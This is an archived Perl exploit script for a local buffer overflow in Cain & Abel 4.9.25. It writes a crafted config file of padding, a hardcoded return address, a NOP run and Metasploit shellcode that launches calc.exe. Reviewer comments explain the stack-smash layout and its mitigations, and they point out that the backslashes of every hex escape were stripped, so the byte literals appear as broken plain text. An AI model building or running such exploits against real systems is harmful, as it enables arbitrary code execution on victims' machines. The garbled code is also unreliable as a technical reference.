# Title : Cain & Abel 4.9.25 (Cisco IOS-MD5) Local Buffer Overflow Exploit
# Published : 2009-01-07
# Author : send9
#!perl -w
# Simple overflow for Cain & Abel v4.9.25 (and below?)
# This script will output a file; import this file as a
# config file under Cracker -> Cisco IOS-MD5 Hashes
#
# If Cain crashes but calc.exe isn't run, change $eip to reflect
# your system.
#
# send9 /at/ chiseclabs.com
use strict;
# Shape of the crafted input, as the author builds it below: 100 bytes of
# filler, then a 4-byte value intended to overwrite a saved return address,
# a short NOP run, and the payload.  This is the classic stack-smash layout;
# it relies on a fixed (non-randomised) kernel32.dll base and on the stack
# being executable, which is why ASLR and DEP/NX -- together with
# bounds-checked parsing of the imported hash file -- are the mitigations.
#
# NOTE(review): in this archived copy the backslashes of every "\x.." escape
# appear to have been stripped, so the quoted literals below are plain ASCII
# text ("xD8x69x83x7C" is 12 characters, not the 4 bytes the trailing
# comment describes).  The code is left exactly as the archive shows it.
my $eip = "xD8x69x83x7C"; # 0x7C8369D8 - kernel32.dll, call esp (WinXP SP2)
my $nop = "x90" x 4;      # four repeats of the literal; named as a NOP sled
my $pad = "A" x 100;      # filler up to the saved return address (offset asserted by the author, not derived here)
# Payload: per the author's comment on the next line, a Metasploit
# win32_exec stub that starts calc.exe, alphanumerically encoded.
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54".
"x42x50x42x30x42x50x4bx48x45x44x4ex53x4bx58x4ex57".
"x45x50x4ax47x41x30x4fx4ex4bx58x4fx44x4ax31x4bx58".
"x4fx35x42x32x41x30x4bx4ex49x44x4bx48x46x53x4bx48".
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x45x46x52x46x50x45x47x45x4ex4bx48".
"x4fx55x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx54".
"x4bx58x4fx35x4ex51x41x50x4bx4ex4bx58x4ex31x4bx38".
"x41x30x4bx4ex49x58x4ex55x46x32x46x30x43x4cx41x43".
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47".
"x4ex30x4bx38x42x34x4ex30x4bx58x42x47x4ex51x4dx4a".
"x4bx48x4ax56x4ax50x4bx4ex49x50x4bx48x42x38x42x4b".
"x42x30x42x30x42x30x4bx48x4ax46x4ex33x4fx35x41x33".
"x48x4fx42x46x48x55x49x38x4ax4fx43x58x42x4cx4bx47".
"x42x35x4ax56x42x4fx4cx38x46x50x4fx55x4ax36x4ax49".
"x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x46x41x36".
"x4ex46x43x46x50x32x45x56x4ax37x45x56x42x30x5a";
# Final file contents, in order: pad | eip | nop | shellcode.
my $b00m = $pad . $eip . $nop . $shellcode;
# Writes the crafted file into the current directory.  Bareword handle and
# 2-arg open are old style; the file name is a fixed literal, so there is no
# mode-injection concern here.  The trailing "n" in the die message looks
# like a "\n" whose backslash was lost in the archive copy.
open(BOF,">cain_ios_ex.conf") or die "Error: Can't open a file for writingn";
print BOF $b00m;
close(BOF);   # unchecked close: a short or failed write would go unnoticed
# Same lost-backslash "n" at the end of this message.
print "Now just open cain_ios_ex.conf as a configuration file under Cracker -> Cisco IOS-MD5 Hashes.n";